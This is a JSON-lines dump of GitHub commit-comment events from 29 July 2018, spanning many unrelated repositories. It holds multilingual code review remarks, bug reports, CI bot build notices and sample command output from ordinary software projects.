{"id":"8033349209","type":"CommitCommentEvent","actor":{"login":"maxice8"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29872279,"position":null,"line":null,"path":null,"commit_id":"e9f598024525818ad71b7786e6bb64295d1780a6","created_at":"2018-07-29T04:21:11Z","updated_at":"2018-07-29T04:21:11Z","author_association":"MEMBER","body":"the license most closely matches the term of 0BSD license and you forgot to bump revision=."}},"created_at":"2018-07-29T04:21:11Z"}
{"id":"8033358677","type":"CommitCommentEvent","actor":{"login":"jhyunleehi"},"repo":{"name":"jhyunleehi/SW"},"payload":{"comment":{"id":29872316,"position":null,"line":null,"path":null,"commit_id":"3d079f4b97732432912563dafa62e27e281f6a60","created_at":"2018-07-29T04:31:13Z","updated_at":"2018-07-29T04:31:13Z","author_association":"OWNER","body":"참 지져분하게 구현 했지만 참 지저분하다."}},"created_at":"2018-07-29T04:31:13Z"}
{"id":"8033359035","type":"CommitCommentEvent","actor":{"login":"jhyunleehi"},"repo":{"name":"jhyunleehi/SW"},"payload":{"comment":{"id":29872317,"position":null,"line":null,"path":null,"commit_id":"3d079f4b97732432912563dafa62e27e281f6a60","created_at":"2018-07-29T04:31:34Z","updated_at":"2018-07-29T04:31:34Z","author_association":"OWNER","body":"뭔가 간결하게 정리될 것 같은데... "}},"created_at":"2018-07-29T04:31:34Z"}
{"id":"8033365111","type":"CommitCommentEvent","actor":{"login":"mora145"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29872357,"position":null,"line":null,"path":null,"commit_id":"d2e9a95dc194f1da35c9ecb2218f1817b25d5f31","created_at":"2018-07-29T04:37:50Z","updated_at":"2018-07-29T04:37:50Z","author_association":"CONTRIBUTOR","body":"No sé por qué. El Git me lo puso como si lo hubiese cambiado todo. "}},"created_at":"2018-07-29T04:37:50Z"}
{"id":"8033367362","type":"CommitCommentEvent","actor":{"login":"wjxalexander"},"repo":{"name":"wjxalexander/jirengu2018"},"payload":{"comment":{"id":29872367,"position":null,"line":null,"path":null,"commit_id":"ea2c98255c1989fa4ac938737410c7539adddeb9","created_at":"2018-07-29T04:40:10Z","updated_at":"2018-07-29T04:40:10Z","author_association":"OWNER","body":"动画登录"}},"created_at":"2018-07-29T04:40:10Z"}
{"id":"8033371849","type":"CommitCommentEvent","actor":{"login":"pabloahb"},"repo":{"name":"pabloahb/Algebrite"},"payload":{"comment":{"id":29872374,"position":65,"line":177,"path":"runtime/symbol.coffee","commit_id":"06ba764949e66e7df5f24eac8f926b685a8f45d8","created_at":"2018-07-29T04:44:55Z","updated_at":"2018-07-29T04:44:55Z","author_association":"OWNER","body":"Hi\r\nPlease read from line 117 to 123, I renamed the function and then created another with the same name\r\n\r\n```\r\n# set the symbols from a symbols - binds object\r\nset_symbols = (symlist) ->\r\n\ti = 0\r\n\tfor i in [0...symlist.symbols.length]\r\n\t\tset_binding(symlist.symbols[i],symlist.binding[i])\r\n\treturn true\r\n\r\n```\r\nI created four functions: get_symbols_as_strings, set_symbols_from_strings, get_symbols and set_symbols\r\n\r\nThe function get_symbols_as_strings returns something like this:\r\n\r\n```\r\n0:{symbol: \"printLeaveEAlone\", script: \"printLeaveEAlone=1\"}\r\n1:{symbol: \"printLeaveXAlone\", script: \"printLeaveXAlone=0\"}\r\n2:{symbol: \"last\", script: \"last=0\"}\r\n3:{symbol: \"autoexpand\", script: \"autoexpand=1\"}\r\n4:{symbol: \"assumeRealVariables\", script: \"assumeRealVariables=1\"}\r\n5:{symbol: \"trace\", script: \"trace=0\"}\r\n6:{symbol: \"version\", script: \"version=\"1.1.2\"\"}\r\n...\r\n```\r\n\r\nAnd you can load it to Algebrite using the function set_symbols_from_strings.\r\n\r\nThe function get_symbols returns something like this:\r\n\r\n```\r\n{symbols: Array(28), binding: Array(28)}\r\nbinding : Array(28)\r\n0:U {cons: {…}, q: rational, k: 1}\r\n1:U {cons: {…}, q: rational, k: 1}\r\n2:U {cons: {…}, q: rational, k: 1}\r\n3:U {cons: {…}, q: rational, k: 1}\r\n...\r\nSymbols : Array(28)\r\n0:U {cons: {…}, q: rational, k: 5, printname: \"printLeaveEAlone\", latexPrint: \"printLeaveEAlone\"}\r\n1:U {cons: {…}, q: rational, k: 5, printname: \"printLeaveXAlone\", latexPrint: \"printLeaveXAlone\"}\r\n2:U {cons: {…}, q: rational, k: 5, printname: \"last\", latexPrint: \"last\"}\r\n3:U {cons: {…}, q: rational, k: 5, printname: \"autoexpand\", latexPrint: \"autoexpand\"}\r\n...\r\n\r\n```\r\nAnd you can load it to Algebrite using the function set_symbols\r\n"}},"created_at":"2018-07-29T04:44:55Z"}
{"id":"8033380582","type":"CommitCommentEvent","actor":{"login":"patrikjuvonen"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29872405,"position":null,"line":null,"path":null,"commit_id":"84c680d2d096ac629a6044f9543b5604435d30bf","created_at":"2018-07-29T04:54:39Z","updated_at":"2018-07-29T04:54:39Z","author_association":"COLLABORATOR","body":"Would it be a good idea to add an element type argument to this function?"}},"created_at":"2018-07-29T04:54:39Z"}
{"id":"8033382166","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"ethereum/go-ethereum"},"payload":{"comment":{"id":29872409,"position":null,"line":null,"path":null,"commit_id":"51df1c1f20201b3ba6fba6e874a3c72f5d2a9123","created_at":"2018-07-29T04:55:39Z","updated_at":"2018-07-29T04:55:39Z","author_association":"NONE","body":"51df1c1"}},"created_at":"2018-07-29T04:55:39Z"}
{"id":"8033382686","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"kurakste/yii2homework"},"payload":{"comment":{"id":29872410,"position":32,"line":142,"path":"controllers/SiteController.php","commit_id":"c96bce54af708e33a2045f3fe8c274dec1246aa8","created_at":"2018-07-29T04:55:56Z","updated_at":"2018-07-29T04:55:56Z","author_association":"NONE","body":"Event::find() вместо new $model)->find(). Но тогда мы это еще не проходили)"}},"created_at":"2018-07-29T04:55:56Z"}
{"id":"8033383432","type":"CommitCommentEvent","actor":{"login":"Pirulax"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29872412,"position":null,"line":null,"path":null,"commit_id":"84c680d2d096ac629a6044f9543b5604435d30bf","created_at":"2018-07-29T04:56:28Z","updated_at":"2018-07-29T04:56:28Z","author_association":"CONTRIBUTOR","body":"If my comments is a valid feedback for you, then yes, that'll good.\r\nHaven't thought about adding it tho. :D"}},"created_at":"2018-07-29T04:56:28Z"}
{"id":"8033384524","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29872417,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-29T04:57:44Z","updated_at":"2018-07-29T04:57:44Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - Win64-Windows-7-VisualStudio-14: OK (2935 of 2935 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-29T04:57:44Z"}
{"id":"8033388039","type":"CommitCommentEvent","actor":{"login":"ali"},"repo":{"name":"ali/acdcontrol"},"payload":{"comment":{"id":29872446,"position":null,"line":null,"path":null,"commit_id":"d775cf6c4f554adc963dfc49682af1492aeb08a3","created_at":"2018-07-29T05:00:41Z","updated_at":"2018-07-29T05:00:41Z","author_association":"OWNER","body":"# `acdcontrol --detect /dev/usb/hiddev*`\r\n```\r\nApple Cinema and Studio Display Control Program. Please, use --about switch to learn more\r\nhiddev driver version is 1.0.4\r\nhiddev driver version is 1.0.4\r\nhiddev driver version is 1.0.4\r\n/dev/usb/hiddev2: USB Monitor - SUPPORTED.\tVendor= 0x5ac (Apple), Product=0x9226[Apple Cinema HD Display 27\"]\r\nhiddev driver version is 1.0.4\r\nhiddev driver version is 1.0.4\r\n/dev/usb/hiddev4: USB Monitor - SUPPORTED.\tVendor= 0x43e (LG Electronics), Product=0x9a40[LG UltraFine 5K 27\"]\r\nhiddev driver version is 1.0.4\r\nhiddev driver version is 1.0.4\r\n```\r\n\r\n# `acdcontrol /dev/usb/hiddev2`\r\n```\r\nApple Cinema and Studio Display Control Program. Please, use --about switch to learn more\r\nhiddev driver version is 1.0.4\r\nWow this looks like the usage code we want.\r\n\r\n  report_type   =3\r\n  report_id     =16\r\n  field_index   =0\r\n  usage_index   =0\r\n  usage_code    =8519696\r\n  value         =861\r\n\r\n  report_type   =3\r\n  report_id     =102\r\n  field_index   =0\r\n  usage_index   =0\r\n  usage_code    =8519782\r\n  value         =2\r\n\r\n  report_type   =3\r\n  report_id     =225\r\n  field_index   =0\r\n  usage_index   =0\r\n  usage_code    =-7208735\r\n  value         =0\r\n\r\n  report_type   =3\r\n  report_id     =236\r\n  field_index   =0\r\n  usage_index   =0\r\n  usage_code    =-7208724\r\n  value         =36923\r\n\r\n  report_type   =3\r\n  report_id     =236\r\n  field_index   =0\r\n  usage_index   =1\r\n  usage_code    =-7208724\r\n  value         =88782\r\n\r\n/dev/usb/hiddev2: BRIGHTNESS=861\r\n```\r\n\r\n# `acdcontrol /dev/usb/hiddev4`\r\n```  \r\nApple Cinema and Studio Display Control Program. Please, use --about switch to learn more\r\nhiddev driver version is 1.0.4\r\nWow this looks like the usage code we want.\r\n\r\n  report_type   =3\r\n  report_id     =0\r\n  field_index   =0\r\n  usage_index   =0\r\n  usage_code    =8519696\r\n  value         =53300\r\n\r\n  report_type   =3\r\n  report_id     =0\r\n  field_index   =1\r\n  usage_index   =0\r\n  usage_code    =983120\r\n  value         =0\r\n\r\n/dev/usb/hiddev4: BRIGHTNESS=53300\r\n```"}},"created_at":"2018-07-29T05:00:41Z"}
{"id":"8033388126","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29872447,"position":null,"line":null,"path":null,"commit_id":"9d3da2ceb7bd1e839fa5971042b8adbbd1348095","created_at":"2018-07-29T05:00:46Z","updated_at":"2018-07-29T05:00:46Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1701 of 1701 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d3da2ceb7bd1e839fa5971042b8adbbd1348095-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d3da2ceb7bd1e839fa5971042b8adbbd1348095-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d3da2ceb7bd1e839fa5971042b8adbbd1348095-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.08%25-green.png)</a>\n"}},"created_at":"2018-07-29T05:00:46Z"}
{"id":"8033388733","type":"CommitCommentEvent","actor":{"login":"patrikjuvonen"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29872451,"position":null,"line":null,"path":null,"commit_id":"84c680d2d096ac629a6044f9543b5604435d30bf","created_at":"2018-07-29T05:01:25Z","updated_at":"2018-07-29T05:01:25Z","author_association":"COLLABORATOR","body":"I was only thinking because [getElementsWithinColShape](https://wiki.multitheftauto.com/wiki/GetElementsWithinColShape) has an `elemType` argument, so adding one here as well would add some more consistency :)"}},"created_at":"2018-07-29T05:01:25Z"}
{"id":"8033390214","type":"CommitCommentEvent","actor":{"login":"EndLess728"},"repo":{"name":"AEXmod/platform_packages_apps_Dialer"},"payload":{"comment":{"id":29872455,"position":null,"line":null,"path":null,"commit_id":"8099cb7291753f274e8075c981f52a6cd20b8152","created_at":"2018-07-29T05:03:02Z","updated_at":"2018-07-29T05:03:02Z","author_association":"NONE","body":"@alexxxdev bro its still not working , here is a video to demonstrate the issue even after this commit \r\n\r\nhttps://drive.google.com/file/d/1qqWAtOjrCjq4FBd5VHJiBKrVPRCjM01c/view?usp=sharing"}},"created_at":"2018-07-29T05:03:02Z"}
{"id":"8033392438","type":"CommitCommentEvent","actor":{"login":"EndLess728"},"repo":{"name":"AEXmod/platform_packages_apps_Dialer"},"payload":{"comment":{"id":29872475,"position":null,"line":null,"path":null,"commit_id":"8099cb7291753f274e8075c981f52a6cd20b8152","created_at":"2018-07-29T05:05:27Z","updated_at":"2018-07-29T05:05:27Z","author_association":"NONE","body":"Bofire applying this commit the time was resetting to zero and starting from beggining , but u can see in the video now when we minimize the call and go back after some time to call now there is not timer in call recording running even it is not stopping or starting the action seems like stucked . have a look into it brother "}},"created_at":"2018-07-29T05:05:27Z"}
{"id":"8033393279","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"Serafim-V/yii"},"payload":{"comment":{"id":29872482,"position":17,"line":17,"path":"controllers/EventController.php","commit_id":"06d9325dd142265b71c602a1f2d978ceb136af87","created_at":"2018-07-29T05:06:27Z","updated_at":"2018-07-29T05:06:27Z","author_association":"NONE","body":"в yii2 во вьюхи списков лучше всего передавать две переменные:\r\ndataProvider и searchModel\r\nпервый поможет легко построить постраничность и вывод моделей, а вторая поможет легко построить форму поиска и фильтрации этого списка. \r\n\r\nИногда третьей переменной можно передавать специализированную ViewModel. \r\n\r\nБольшое и не типовое количество переменных сильно усложняют работу с контроллерами. "}},"created_at":"2018-07-29T05:06:27Z"}
{"id":"8033394864","type":"CommitCommentEvent","actor":{"login":"JianWirt"},"repo":{"name":"high-speed-downloader/high-speed-downloader"},"payload":{"comment":{"id":29872488,"position":null,"line":null,"path":null,"commit_id":"b1890ae92e98a312ad491de990b5717303b7a727","created_at":"2018-07-29T05:08:11Z","updated_at":"2018-07-29T05:08:11Z","author_association":"NONE","body":"这只是个下载器，各位大哥千万别点暂停，9成几率文件损坏，并且提示高速受限，如果高速受限，重新下载就行了，或者换个账号。"}},"created_at":"2018-07-29T05:08:11Z"}
{"id":"8033396295","type":"CommitCommentEvent","actor":{"login":"slashiee"},"repo":{"name":"slashiee/Ryujinx"},"payload":{"comment":{"id":29872504,"position":null,"line":null,"path":null,"commit_id":"8e7ef42aa39eb9b5c5ec8ebc54f0c9fc6728c90f","created_at":"2018-07-29T05:09:41Z","updated_at":"2018-07-29T05:09:41Z","author_association":"OWNER","body":"Allows Sonic Mania 1.04 to boot in the emulator.\r\n![2018-07-28_21-59-23](https://user-images.githubusercontent.com/15317421/43363165-e9bde958-92b2-11e8-99b0-589f230b1e63.png)\r\n![2018-07-28_22-08-42](https://user-images.githubusercontent.com/15317421/43363162-e3640786-92b2-11e8-96e1-165289061e1a.png)\r\n"}},"created_at":"2018-07-29T05:09:41Z"}
{"id":"8033396340","type":"CommitCommentEvent","actor":{"login":"Alruddy"},"repo":{"name":"Alruddy/MiniOS"},"payload":{"comment":{"id":29872505,"position":null,"line":null,"path":null,"commit_id":"8d8189d02f961a479c0911014929978f3f4c0148","created_at":"2018-07-29T05:09:45Z","updated_at":"2018-07-29T05:09:45Z","author_association":"OWNER","body":"```bash\r\ndd if=./loader.bin of=/opt/bochs/hd60M.img bs=512 count=4 seek=2 conv=notrunc\r\n```"}},"created_at":"2018-07-29T05:09:45Z"}
{"id":"8033397990","type":"CommitCommentEvent","actor":{"login":"lihjgamer"},"repo":{"name":"cloudwu/skynet"},"payload":{"comment":{"id":29872513,"position":null,"line":null,"path":null,"commit_id":"d4b5e8f62f30dd883dca6cdaabf4607998f21ef0","created_at":"2018-07-29T05:11:26Z","updated_at":"2018-07-29T05:11:26Z","author_association":"NONE","body":"mongodb driver's safe_* functions have three return values:\r\nfirst : execute reuslt true/false\r\nsecond : error desc\r\nthree : mongodb returns detail info\r\n\r\nin this test:\r\nwe use the first return value as the third one ，this cause a assert.\r\ni add  two params to recive the first and second"}},"created_at":"2018-07-29T05:11:26Z"}
{"id":"8033400715","type":"CommitCommentEvent","actor":{"login":"balathumma10"},"repo":{"name":"reworkhow/JWAS.jl"},"payload":{"comment":{"id":29872520,"position":null,"line":null,"path":null,"commit_id":"32dfad554ebac479f285d290722ec73d46e45e12","created_at":"2018-07-29T05:14:14Z","updated_at":"2018-07-29T05:14:14Z","author_association":"NONE","body":"Hi,\r\nI get the following error running SSBR. I am trying to follow the instructions for running SSBR. Could please help.\r\ninput=InputParameters()\r\nERROR: UndefVarError: InputParameters not defined"}},"created_at":"2018-07-29T05:14:14Z"}
{"id":"8033401786","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29872533,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-29T05:15:16Z","updated_at":"2018-07-29T05:15:16Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-29T05:15:16Z"}
{"id":"8033402834","type":"CommitCommentEvent","actor":{"login":"cr6git"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29872538,"position":null,"line":null,"path":null,"commit_id":"e9f598024525818ad71b7786e6bb64295d1780a6","created_at":"2018-07-29T05:16:22Z","updated_at":"2018-07-29T05:16:22Z","author_association":"CONTRIBUTOR","body":"I was wrong, sorry. Reverted."}},"created_at":"2018-07-29T05:16:22Z"}
{"id":"8033407775","type":"CommitCommentEvent","actor":{"login":"wendingp"},"repo":{"name":"high-speed-downloader/high-speed-downloader"},"payload":{"comment":{"id":29872550,"position":null,"line":null,"path":null,"commit_id":"b1890ae92e98a312ad491de990b5717303b7a727","created_at":"2018-07-29T05:21:22Z","updated_at":"2018-07-29T05:21:22Z","author_association":"NONE","body":"@JianWirt 重新下和换账号都试过了没用"}},"created_at":"2018-07-29T05:21:22Z"}
{"id":"8033418449","type":"CommitCommentEvent","actor":{"login":"gaurav3010"},"repo":{"name":"gaurav3010/clinic-website"},"payload":{"comment":{"id":29872605,"position":null,"line":null,"path":null,"commit_id":"2d5c40f1471b1934c8ee4637ed62e0ba70c70c6a","created_at":"2018-07-29T05:31:43Z","updated_at":"2018-07-29T05:31:43Z","author_association":"OWNER","body":"nav and slide"}},"created_at":"2018-07-29T05:31:43Z"}
{"id":"8033419479","type":"CommitCommentEvent","actor":{"login":"DerekQXu"},"repo":{"name":"DerekQXu/Chat_App"},"payload":{"comment":{"id":29872609,"position":null,"line":null,"path":null,"commit_id":"695d952a3e87dc5aadf84dfa89a17c3abc7476a5","created_at":"2018-07-29T05:32:48Z","updated_at":"2018-07-29T05:32:48Z","author_association":"OWNER","body":"This was me\r\n- Derek"}},"created_at":"2018-07-29T05:32:48Z"}
{"id":"8033420559","type":"CommitCommentEvent","actor":{"login":"ailinrb"},"repo":{"name":"IntroCompuMovil18301/Mictlan"},"payload":{"comment":{"id":29872611,"position":null,"line":null,"path":null,"commit_id":"a5df1a1820251139e99822ebe6accb0a6e504b4c","created_at":"2018-07-29T05:33:58Z","updated_at":"2018-07-29T05:33:58Z","author_association":"NONE","body":"# JASP"}},"created_at":"2018-07-29T05:33:58Z"}
{"id":"8033421515","type":"CommitCommentEvent","actor":{"login":"Pirulax"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29872615,"position":null,"line":null,"path":null,"commit_id":"84c680d2d096ac629a6044f9543b5604435d30bf","created_at":"2018-07-29T05:35:04Z","updated_at":"2018-07-29T05:35:04Z","author_association":"CONTRIBUTOR","body":"Adding here an elemType too would be a good idea."}},"created_at":"2018-07-29T05:35:04Z"}
{"id":"8033423061","type":"CommitCommentEvent","actor":{"login":"psmduarte"},"repo":{"name":"psmduarte/Signos"},"payload":{"comment":{"id":29872621,"position":null,"line":null,"path":null,"commit_id":"854df6a06a6db5266028dcef1e8b7dbe245dcb1b","created_at":"2018-07-29T05:36:49Z","updated_at":"2018-07-29T05:36:49Z","author_association":"OWNER","body":"Falta terminar o programa... "}},"created_at":"2018-07-29T05:36:49Z"}
{"id":"8033427106","type":"CommitCommentEvent","actor":{"login":"NBR-hugh"},"repo":{"name":"Vwan/sicp-lamp"},"payload":{"comment":{"id":29872630,"position":21,"line":72,"path":"ch2/2.2HierarchicalDataandtheClosureProperty.md","commit_id":"6d1f9a8e5d23f16cf22fd0f8a74e482db6155d60","created_at":"2018-07-29T05:40:53Z","updated_at":"2018-07-29T05:40:53Z","author_association":"NONE","body":"@Vwan 有大概模糊的感觉,关键是递归,使用 lisp 的[现成函数]去解决实际问题的原理与使用lisp(其他什么更基础的元素)来实现[现成函数]的原理是一样的."}},"created_at":"2018-07-29T05:40:53Z"}
{"id":"8033427215","type":"CommitCommentEvent","actor":{"login":"nschneid"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29872631,"position":7,"line":61,"path":"wiki/plugins/metadata/templatetags/metadata_tags.py","commit_id":"d198fe638f6f34138c796a096dbf3e6ab7dad4bd","created_at":"2018-07-29T05:41:00Z","updated_at":"2018-07-29T05:41:00Z","author_association":"CONTRIBUTOR","body":"Come to think of it, should this HTML-escape the string? Same for line 53."}},"created_at":"2018-07-29T05:41:00Z"}
{"id":"8033427653","type":"CommitCommentEvent","actor":{"login":"amadorj23"},"repo":{"name":"interledgerjs/moneyd-uplink-xrp"},"payload":{"comment":{"id":29872633,"position":null,"line":null,"path":null,"commit_id":"e454026d5301de83be2630555917d412973cc998","created_at":"2018-07-29T05:41:31Z","updated_at":"2018-07-29T05:41:31Z","author_association":"NONE","body":"Channel ID only seems to display 8 characters. Seems like the column is not wide enough. Attempted to output to text file to see if it was a screen resolution/width issue but records same output. \r\n\r\nSeems to match line 245 so guessing as designed? \r\n\r\nQuestion is there a way to query channel ID info per moneyd config? I looked at moneyd.json to see if it was there but no luck. Would this info be displayed when registering a new channel?"}},"created_at":"2018-07-29T05:41:31Z"}
{"id":"8033429216","type":"CommitCommentEvent","actor":{"login":"hokx"},"repo":{"name":"simple-icons/simple-icons"},"payload":{"comment":{"id":29872644,"position":4,"line":198,"path":"_data/simple-icons.json","commit_id":"bc9f1c058cc2abb73b432ce82faa445202d53bf0","created_at":"2018-07-29T05:43:18Z","updated_at":"2018-07-29T05:43:18Z","author_association":"NONE","body":"Greyed out"}},"created_at":"2018-07-29T05:43:18Z"}
{"id":"8033430313","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29872648,"position":null,"line":null,"path":null,"commit_id":"9d3da2ceb7bd1e839fa5971042b8adbbd1348095","created_at":"2018-07-29T05:44:23Z","updated_at":"2018-07-29T05:44:23Z","author_association":"NONE","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2327 of 2327 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d3da2ceb7bd1e839fa5971042b8adbbd1348095-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d3da2ceb7bd1e839fa5971042b8adbbd1348095-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-29T05:44:23Z"}
{"id":"8033431157","type":"CommitCommentEvent","actor":{"login":"brittpomales"},"repo":{"name":"brittpomales/fid"},"payload":{"comment":{"id":29872652,"position":null,"line":null,"path":null,"commit_id":"c039e2fc7baf4a8f47254bdecabefd7caa0a3a53","created_at":"2018-07-29T05:45:16Z","updated_at":"2018-07-29T05:45:16Z","author_association":"OWNER","body":"![lolpizza](https://user-images.githubusercontent.com/39354202/43363358-0966bbd6-92d1-11e8-91d0-1332e70ddd91.jpg)\r\n"}},"created_at":"2018-07-29T05:45:16Z"}
{"id":"8033431410","type":"CommitCommentEvent","actor":{"login":"czlee"},"repo":{"name":"TabbycatDebate/tabbycat"},"payload":{"comment":{"id":29872653,"position":null,"line":null,"path":null,"commit_id":"8c6fdf20266e1f8ace0fcb35c012cdaa8b31584d","created_at":"2018-07-29T05:45:34Z","updated_at":"2018-07-29T05:45:34Z","author_association":"MEMBER","body":"Just a heads-up, toggling sounds like a simple solution but you can run into usability issues: If a user has an out-of-date page still loaded on their browser (_e.g._ because they opened a link twice, or because the tab director checked them in after they loaded the page on their phone), you can get into situations where the button says \"Check in\" but will actually revoke the check-in (because there's an existing one), or where the button says \"Revoke\" but will actually check the person in (because there's no existing one).\r\n\r\nThis commit adds a hidden field to the form to say either \"revoke\" or \"checkin\", and the view now checks the hidden field to determine whether it should check in or revoke, and shows an error if it would be a duplicate action (_e.g._ trying to revoke a checkin that's already revoked).\r\n\r\nI'm mainly pointing this out because we have a lot of patterns like this in our code base, and we should get into the habit of always making sure links will do what they say (or raise an error if they can't).\r\n\r\nping @tienne-B @philipbelesky"}},"created_at":"2018-07-29T05:45:34Z"}
{"id":"8033434143","type":"CommitCommentEvent","actor":{"login":"alexxxdev"},"repo":{"name":"AEXmod/platform_packages_apps_Dialer"},"payload":{"comment":{"id":29872658,"position":null,"line":null,"path":null,"commit_id":"8099cb7291753f274e8075c981f52a6cd20b8152","created_at":"2018-07-29T05:48:28Z","updated_at":"2018-07-29T05:48:28Z","author_association":"MEMBER","body":"ok, I'll check it again"}},"created_at":"2018-07-29T05:48:28Z"}
{"id":"8033436455","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29872667,"position":null,"line":null,"path":null,"commit_id":"bfe78109023448dc050bf65e991b7a1c45748420","created_at":"2018-07-29T05:51:03Z","updated_at":"2018-07-29T05:51:03Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/2057/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 21613 seconds\n\nTests produced 2791 warnings. 2791 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-29T05:51:03Z"}
{"id":"8033437392","type":"CommitCommentEvent","actor":{"login":"trapecio76"},"repo":{"name":"ty4z2008/Qix"},"payload":{"comment":{"id":29872674,"position":null,"line":null,"path":null,"commit_id":"d3cf3f3294acaf14cb53f138e314411bd9f80e80","created_at":"2018-07-29T05:52:07Z","updated_at":"2018-07-29T05:52:07Z","author_association":"NONE","body":"PLSE8ODhjZXjYgTIlqf4Dy9KQpQ7kn1Tl0"}},"created_at":"2018-07-29T05:52:07Z"}
{"id":"8033438108","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29872675,"position":null,"line":null,"path":null,"commit_id":"c27629ffaba02796e60e53c1bec58c2ced33526a","created_at":"2018-07-29T05:52:49Z","updated_at":"2018-07-29T05:52:49Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 729](https://travis-ci.org/per1234/arduino-ci-script/builds/409450944) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00729-001-tsv"}},"created_at":"2018-07-29T05:52:49Z"}
{"id":"8033438199","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29872676,"position":null,"line":null,"path":null,"commit_id":"c27629ffaba02796e60e53c1bec58c2ced33526a","created_at":"2018-07-29T05:52:54Z","updated_at":"2018-07-29T05:52:54Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 729](https://travis-ci.org/per1234/arduino-ci-script/builds/409450944) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00729"}},"created_at":"2018-07-29T05:52:54Z"}
{"id":"8033447553","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29872726,"position":null,"line":null,"path":null,"commit_id":"74cb52ff68482149247dbc3eb995f8b31130a0e3","created_at":"2018-07-29T06:02:46Z","updated_at":"2018-07-29T06:02:46Z","author_association":"NONE","body":"You should check if the pawn is really blocked by not allowing attacks by opponent pawns (else the pawn could capture). Or for general if the pawn can capture at all (but i think thats a to volatile pattern)"}},"created_at":"2018-07-29T06:02:46Z"}
